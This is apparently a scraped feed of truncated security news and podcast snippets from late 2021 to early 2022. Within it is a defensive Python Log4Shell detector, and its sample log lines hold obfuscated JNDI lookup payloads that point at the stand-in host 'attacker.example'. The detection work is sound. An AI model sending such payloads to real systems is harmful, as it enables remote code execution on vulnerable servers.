Phishing E-Mail With an Advertisement
/ Virustotal Credential https://www.safebreach.co
yber-crime/ Oracle Quarterly Critical Patch Update https://www.or ...
Picture of the Week. "Hack the Pentagon" with Log4j. Open Source Software Security Summit. Microsoft's January Patch Tuesday Review: The GOOD News. Microsoft's January Patch Tuesday Review: The Not So Good News. Check Your Router Firmware Updates. Chrome to Imp ...
Researchers at browser identification company FingerprintJS recently found and disclosed a fascinating data leakage bug in Apple’s web browser software. Technically, the bug exists in Apple’s open source WebKit “browser engine”, which means it aff ...
1.1 Intro I spent my early IT career working for a Cisco partner that specialized in Cisco phone systems. My work wasn’t directly with the phone systems, but it was usually in an adjacent field like route/switch and security. I did, however ...
Log4Shell Attacks Getting Smarter
Microsoft Releases Special Update to Deal with January Update Fail https://www.bleepingcompu
Found love online? Sending them money? Friends and family warning you it could be a scam? Don't be too quick to dismiss their concerns...
This month Chris Hadnagy and Ryan MacDougall are joined by John Strand from Black Hills Information Security. John has consulted for and trained hundreds of organizations in the areas of security, regulatory compliance, and penetration testing. He is ...
Use of Alternate Data Streams in Research Scans
/ Microsoft Resumes Windows Server 2019 Cumulative Updates https://www.bleepingcompu
This is a special edition of Social-Engineer's Human Element Series Podcast. Chris Hadnagy will discuss Covid-19 testing site scams, and how you can protect yourself against them. [January 14, 2022] 00:00 – Intro social-engineer.com/ social-engine ...
Imagine if someone who didn't have your password could sneakily modify data that was encrypted with it.
The Russian Federal Security Service (FSB) has just published a report about the investigation and arrest of the infamous "REvil" ransomware crew.
MSFT Patch Issues
In this edition of the soap box we’re chatting with Steve Miller, the head of threat intelligence at Stairwell. Steve has a long history doing this sort of stuff. He worked inside various bits of the US government doing cyber things, and also spent a de ...
In this edition of the soap box we’re chatting with Steve Miller, a senior researcher at Stairwell. Steve has a long history doing this sort of stuff. He worked inside various bits of the US government doing cyber things, and also spent a decent chunk o ...
Latest episode -listen to it or read it now!
I briefly mentioned using DKIM to verify an email’s sender in a previous blog post that described the steps I took to determine whether a suspicious email was legitimate or a phishing attempt. In this post, we will take a deeper dive into how organizati ...
A Quick CVE-2022-21907 FAQ
/28234/ Details Released Regarding Patched Sonicwall Vulnerabilities https://www.rapid7.com/bl
One bug in the January 2022 Patch Tuesday list is getting lots of attention: "HTTP Protocol Stack Remote Code Execution Vulnerability".
Microsoft Patch Tuesday - January 2022
0/ Adobe Updates https://helpx.adobe.com/s
Picture of the Week. The US CISA Log4J status update. The H2 Database Console vulnerability. The Federal Trade Commission gets into the act! Chrome fixed 37 known problems last week. The Privacy-first Brave browser. WordPress 5.8.3 security update. What, ...
On this week’s show Patrick Gray, Katie Nickels and Joe Slowik discuss the week’s security news, including: US Government warns of impending critical infrastructure hacks Log4j bug in VMware gets a workout Ex Uber CSO Joe Sullivan facing wire ...
Got a router that supports USB access across the network? You might need a kernel update...
I briefly mentioned how easy it is to forge email sender addresses in a previous blog post that described the steps I took to determine whether a suspicious email was legitimate or a phishing attempt. In this post, we will take a deeper dive into why emai ...
New MacOS Vulnerability Could Lead to Unauthorized User Data Access
ss Exploiting URL Parsers https://claroty.com/wp-co
This month Chris Hadnagy is joined by the fascinating Amy Herman. Amy is a lawyer and an art historian who uses works of art to sharpen observation, analysis, and communication skills. She developed her Art of Perception seminar in 2000 and since then ha ...
Extracting Cobalt Strike Beacons from MSBuild Scripts
uild+Scripts/28200/ The JNDI Strikes Back: Unauthenticated RCE in H2 Database Console https://jfrog.com/blog/th
Where were YOU on the night of 17 May 2002? And what about the day after that?
"It's Log4Shell, Jim, but not as we know it." How to find and fix a JNDI-based vuln in the H2 Database Engine.
Malicious Python Script Targeting Chinese People
+People/28220/ Google Docs Comment Exploit Allows for Distribution of Phishing and Malware https://www.avanan.com/bl
1.0 Introduction On Friday, December 10, 2021, Charlie Clark (@exploitph) published a blog post detailing the weaponization of CVE-2021-42287 and CVE-2021-42278. In the blog post, Charlie extensively covered the background of the vulnerabilities, how the ...
We're back for 2022 - listen now!
Code Reuse in the Malware Landscape
/ ZLoader Campaign Exploiting Signature Verification Bug https://research.checkpoi
Remember the Equifax breach? Remember the $700m penalty? In case you'd forgotten, here's the FTC to refresh your memory!
A Simple Batch File That Blocks People
212/ Windows Server Remote Desktop Emergency Update https://docs.microsoft.co
ter#2772 Mal ...
Picture of the Week. Log4j's 5th update. Microsoft's Log4j scanner triggers false positives. Chinese government is annoyed with Alibaba. "Hack the DHS" Bug Bounty Expanded. COVID postpones the RSA Conference. DuckDuckGo continues to grow. The cost of cybe ...
On this week’s show Patrick Gray and Adam Boileau discuss the week’s security news, including: The log4j bug wrap The ransomware wrap The human rights and surveillance industry wrap Research and carnage wrap This week’s show is brought t ...
The finder of this bug insists it "poses a serious risk". We're not so sure, but we recommend you take steps to avoid it anyway.
McAfee Phishing Campaign with a Nice Fake Scan https://isc.sans.edu/
Fake+Scan/28208/ Trend Micro Apex One Patch https://success.tren
9996 E-commerce Bots Using Cheap Domain Registrati ...
Exchange Server Year 2022 Bug https://isc.sans.edu/f
ues/ba-p/3049447 Agent Tesla ...
We deconstructed a copyright phish so you don't have to. Be warned: the crooks are getting better at these scams...
Log4j 2 Security Vulnerabilities Update Guide https://isc.sans.edu
t Defender Log4j False Positives https://www.blee
It's a Log4j bug, and you ought to patch it. But we don't think it's a critical crisis like the last one.
Log4j Vulnerability CVE-2021-44832 https://log
4832 LotL Classifiers https://isc.sa
/ LastPass Credential Stuffing https://www.bleep
Leo Laporte walks through some of the highlights of the show and most impactful stories of 2021. Stories include: SolarWinds Hack Detailed By Microsoft Crispy Subtitles from Lay's Remembering Dan Kaminsky REvil Hacks Apple Supplier Quanta Computer The "D ...
Attackers are Abusing MSBuild to Evade Defenses and Implant Cobalt Strike Beacons https://isc.sans.e
180/ Bypassing File Quarantine, Gatekeeper and Notarizat ...
Log4j/Log4Shell and Cloud Internal Meta Data Services https://isc.sans.
Happy Holidays! Our Top N stories, all totally SFW!
You know you want one, because this retro phone is NOT A TOY... except when it comes to cybersecurity.
Forensics Challenge Solution https://isc.sans.
lume COVID Home Test Weak ...
Phew! An audacious crime... that didn't work out.
More Undetected PowerShell Droppers https://isc.sans.
r/28158/ Apache Patches https://httpd.apac
lities_24.html Auerswald COMpact Multiple Backdoors https://www.redt
Picture of the Week. Google's 16th exploited Chrome 0-day of the year. Firefox refuses to do Microsoft.com! Firefox disabled Microsoft's Cloud Clipboard. Weaknesses in all cellular networks since 2G. Cross Wi-Fi / Bluetooth leakage. "The Matrix Resurrecti ...
The Apache web server just got an update - this one is nothing to do with Log4j!
PowerPoint Attachments: Agent Tesla and Code Reuse in Malware https://isc.sans.e
e/28154/ VMware Workspace ONE Patch / log4j status https://www.vmware.
tml Atta ...
Be happy that your sysadmins are taking one (three, actually!) for the team right now... here's why!
This month, Chris Hadnagy and Ryan MacDougall are joined by Adam Levin. Adam is a nationally recognized expert on cybersecurity, privacy, identity theft, fraud, and personal finance and has distinguished himself as a fierce consumer advocate for the p ...
Disaster Recovery Automation Using Public DNS APIs https://isc.sans.edu/
8146/ Office 2021: VBA Project Version https://isc.sans.e
150/ Log4j Updates https://ww ...
Have you ever seen the message "An error occurred"? Even worse, the message "This error cannot occur"? Facts matter!
How the "Contact Forms" Campaign Tricks People https://isc.sans.ed
h Used to Extract WiFi Secrets https://arxiv.org/
pdf/2112.05719.pdf Lenovo Privilege Escalation Vulnerability https:/ ...
Latest episode - listen now! (Yes, there are plenty of critical things to go along with Log4Shell.)
Undetected PowerShell Backdoor https://isc.sans.
Backdoor/28138/ Adobe Security Updates https://helpx.adob
e Deserialization Bug in Microsoft RDP Client Through Smart Card Extension htt ...
day/28132/ Log4j Updates https://isc.sans.e
enough/28134/ Log4j Scanner https://github.com
Picture of the Week. Amazon outage and cloud dependence. Windows 11 vs Your Browser of Choice. WordPress once again in the crosshairs. Closing the Loop. Log4j & Log4Shell. We invite you to read our show notes at https://www ...
Get 'em while they're hot!
Log4Shell Becoming Part of the Day to Day Grind https://isc.sans.edu
B5D3Ys Google Chrome Update https://chromerelea
On December 9, 2021, a severe vulnerability in Apache Log4j was disclosed (CVE-2021-44228). This vulnerability, also known as Log4Shell, allows unauthenticated remote code execution in many applications through ordinary web requests, because any attacker-controlled string that reaches a log statement can carry a JNDI lookup that Log4j resolves. Almost immediately ...
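The lookup strings that trigger Log4Shell are easy to match literally, but they were obfuscated almost immediately with Log4j's own nested lookups (`${lower:j}`, `${upper:n}`, and the `${name:-default}` default-value syntax, which yields the default when the named variable is unset). The following is an added example, not code from the post above or from any project linked on this page: it resolves those three obfuscation forms the way Log4j 2 would and then flags JNDI lookups in sample access-log lines. The log lines, the `attacker.example` host and the function names are constructed for illustration, and the normalizer deliberately handles only those three lookup forms rather than reimplementing Log4j's full substitution engine.

```python
import re

# Constructed sample access-log lines (not taken from any real incident).
# Line 1 carries a plain JNDI lookup in the User-Agent, line 2 a case- and
# nesting-obfuscated one, line 3 a default-value-syntax obfuscation in the
# query string, and line 4 a non-JNDI lookup that must not be flagged.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${lower:l}dap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET /?x=${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/x} HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '10.0.0.7 - - [10/Dec/2021:12:00:05 +0000] "GET /?q=${env:HOME} HTTP/1.1" 200 10 "-" "Mozilla/5.0"',
]

# An innermost lookup: ${...} with no further ${ or } inside the braces.
INNERMOST_LOOKUP = re.compile(r"\$\{([^{}]*)\}")
# A JNDI lookup and its protocol (ldap, ldaps, rmi, dns, iiop, ...). Log4j
# lower-cases the lookup name before dispatch, so the match is case-insensitive.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def resolve_lookup(body: str):
    """Resolve one innermost lookup body the way Log4j 2 would for the three
    forms used as obfuscation. Returns None for anything else, which is left
    in place (including the ${jndi:...} we want to see after normalization)."""
    if ":-" in body:
        # Default-value syntax ${name:-default}: the variable is assumed unset,
        # so the default is substituted. ${::-j} -> "j", ${sys:nope:-j} -> "j".
        return body.split(":-", 1)[1]
    name, sep, arg = body.partition(":")
    if not sep:
        return None
    name = name.strip().lower()
    if name == "lower":
        return arg.lower()
    if name == "upper":
        return arg.upper()
    return None


def normalize(text: str, max_rounds: int = 32) -> str:
    """Repeatedly resolve innermost obfuscation lookups until nothing changes.
    Each round only touches innermost lookups, so nesting depth bounds the rounds."""
    for _ in range(max_rounds):
        changed = False

        def substitute(match):
            nonlocal changed
            resolved = resolve_lookup(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = INNERMOST_LOOKUP.sub(substitute, text)
        if not changed:
            break
    return text


def find_jndi(lines):
    """Return (line_index, protocol) for every JNDI lookup found after
    normalization; the protocol is lower-cased for consistent reporting."""
    findings = []
    for index, line in enumerate(lines):
        for match in JNDI_LOOKUP.finditer(normalize(line)):
            findings.append((index, match.group(1).lower()))
    return findings


if __name__ == "__main__":
    for index, protocol in find_jndi(SAMPLE_LOG_LINES):
        print(f"line {index}: JNDI lookup via {protocol}: {normalize(SAMPLE_LOG_LINES[index])}")
```

Two points worth noting from the sample. The `${upper:n}` in line 2 normalizes to `${jNdi:...}`, which Log4j still dispatches to the JNDI lookup, so a case-sensitive literal match on `${jndi:` would miss it; and a clean scan of your logs is evidence only about the obfuscations you modelled, not a substitute for patching, since Log4j evaluates many more lookups (`date`, `sys`, `env`, and so on) than this normalizer resolves.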
This month Chris Hadnagy is joined by our good friend, Anne-Maartje Oud. For 20 years Anne-Maartje has been a behavioral advisor, consultant, chairwoman, and keynote speaker. On top of that she is the CEO and founder of The Behavior Company based in Amste ...
Remote Code Execution in log4j2 https://isc.sans.ed
20/ Log4j Zero Day https://www.lunasec.io
/ Log4j2/Log4Shell Followup: What we see and how to defend and ho ...
Find out how to deal with the Log4Shell vulnerability right across your estate. Yes, you need to patch, but that helps everyone else along with you!
Just when you thought it was safe to relax for the weekend... a critical bug showed up in Apache's Log4j product
Phishing Direct Messages via Discord https://isc.sans.e
rd/28114/ Vulnerable MikroTik Routers https://eclypsium.
ts/ log4j RCE 0-day https://www.lunasec.
This isn’t the normal weekly news episode of the show, if you’re looking for the regular weekly Risky Business podcast, scroll one back in your podcast feed. This is a Soap Box edition, a wholly sponsored podcast brought to you in this instance by Thi ...
Listen now or read as an article! (Full transcript inside.)
Intro I was at my local Target recently and spotted the section near the video games, where there were some little collectable arcade systems and handhelds that play games like Pac-Man, Galaga, and Contra. Figure 1 – Target Arcade Games and Handhe ...
December 2021 Forensic Challenge https://isc.sans
/28108/ Microsoft and GitHub OAuth Implementation Vulnerabilities Lead to Redirection Attacks https://www.proofp
Webshells, Webshells everywhere! https://isc.sa
/28106/ AWS Outage https://status.aws.
amazon.com Misconfigured Kafdrop Puts Companies' Apache Kafka Completely Exposed https://spectralop
Picture of the Week. Tavis finds a bad bug in NSS. Cheap Smartwatches for kids and babies? Additional VPN vendors just say no to Roskomnadzor! Windows 11 loosens its grip on Edge. RTF Templates being used to inject malicious content. A Malicious Botnet us ...
On this week’s show Patrick Gray and Adam Boileau discuss the week’s security news, including: NSO Group tools found on US embassy staff phones in Uganda Mitto is up to shady bidnez Ubiquiti “whistleblower” charged over hack Hounds everywhe ...
Firefox 95.0 is out, with the usual security fixes... plus some funky new ones.
The Importance of Out of Band Networks https://isc.sans.
rks/28102/ Kaseya Unitrends Backup Appliance Updates https://helpdesk.k
es/4412762258961 Is KAX17 Performing De-Anonymization A ...
Think of a number, any number. Take away 42. Add 42 back in. Then pretend you didn't take away 42. How much is left?
The UPX Packer will never die https://isc.sans.edu/f
Survey of Airgap Attacks https://www.welive
ity Victim of Insider Extortionhttps:/ ...
Mozilla's cryptographic code had a critical bug. The problem is that numerous apps are affected and may need patching individually.
TA551 (Shathak) Pushes IcedID (Bokbot) https://isc.sans.
t/28092/ pip-audit scanning Python packages for known vulnerabilities https://py
Wifi Router Flaws https://www.iot-insp
Latest episode - listen now!
"Must be at least THIS tall to go on ride" seems to be the starting point. Too little, too late? Or better than nothing?
Info-Stealer Using webhook.site to Exfiltrate Data https://isc.sans.edu/
a NSS Library Vulnerability https://bugs
EwDoor Botnet is At ...
Hunting for PHPUnit Installed via Composer https://isc.sans.
t Defender Scares Admins with Emotet False Positives https://www.ble
Picture of the Week. "Super Duper Secure Mode" 37% of the world's smartphones are vulnerable. The RAT Dispenser. The Entirely Predictable 0-Day Windows Exploit. "The Frontiers Saga: Fringe Worlds" Closing the Loop. Bogons Begone! We invite you to read our ...
On this week’s show Patrick Gray and Adam Boileau discuss the week’s security news, including: Israel slashes number of countries it will export cyber tools to Interpol takes down 1,000 Internet fraudsters Ransomware crews lying low? When the t ...
Scraping data for a facial recognition service? "That's unlawful", concluded both the British and the Australians.
Wireshark 3.6.0 Released https://isc.sans.
gle Cloud Security Report https://services.go
v2021.pdf Zoom Patch https://explore.zoom
Phishing Pages Hiding Themselves Using a Dynamically Adjusted IP-Based Allow List https://isc.sans.edu/
ot Phishing Checks Screen Resolution to Evade Researchers ht ...
Cloud security is the best sort of altruism: you need to do it to protect yourself, but you help to protect everyone else at the same time.
Latest episode - listen now! Solid cybersecurity advice in plain English.
Those numbers that show up on your phone to tell you who's calling? Treat them as SUGGESTIONS, never as PROOF.
YARA Rule for OOXML Maldocs: Less False Positives https://isc.sans
Zero-Day Windows Installer Exploit https://www.bleepi
Picture of the Week. An idea whose time has passed... The stats of brute force password attacks. The Most Common Passwords. GoDaddy Breached Bigtime! A heads-up about NetGear routers. HTTP Request Smuggling. We invite you to read our show notes at https:/ ...
On this week’s show Patrick Gray and Adam Boileau discuss the week’s security news, including: Apple sues NSO Group and it’s all a bit weird Israel charges defence minister’s house cleaner with Iranian hacker collusion (really) USA charges tw ...